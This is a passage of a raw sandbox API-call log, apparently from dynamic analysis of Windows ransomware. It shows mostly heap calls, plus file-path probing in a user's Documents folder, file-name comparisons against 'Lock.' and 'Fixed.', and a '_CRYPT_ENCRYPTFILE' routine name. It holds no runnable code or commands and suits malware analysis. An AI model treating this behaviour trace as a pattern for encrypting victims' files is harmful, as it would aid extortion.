hHeap=0x970000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0263.855] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/hYiEt-0f.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx", lpFilePart=0x8cf650*="hYiEt-0f.docx") returned 0x27 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0263.855] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\hYiEt-0f.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hyiet-0f.docx")) returned 0xffffffff [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.855] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0263.855] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.856] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ith_1X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="th_1X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h_1X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_1X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FN3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hB-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0263.857] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e55a40 [0263.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ith_1X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="th_1X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h_1X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_1X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FN3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hB-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0263.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0263.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0263.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.860] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0263.860] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0263.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0263.860] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0263.861] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0263.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0263.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0263.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0263.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0263.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0263.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0263.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.866] 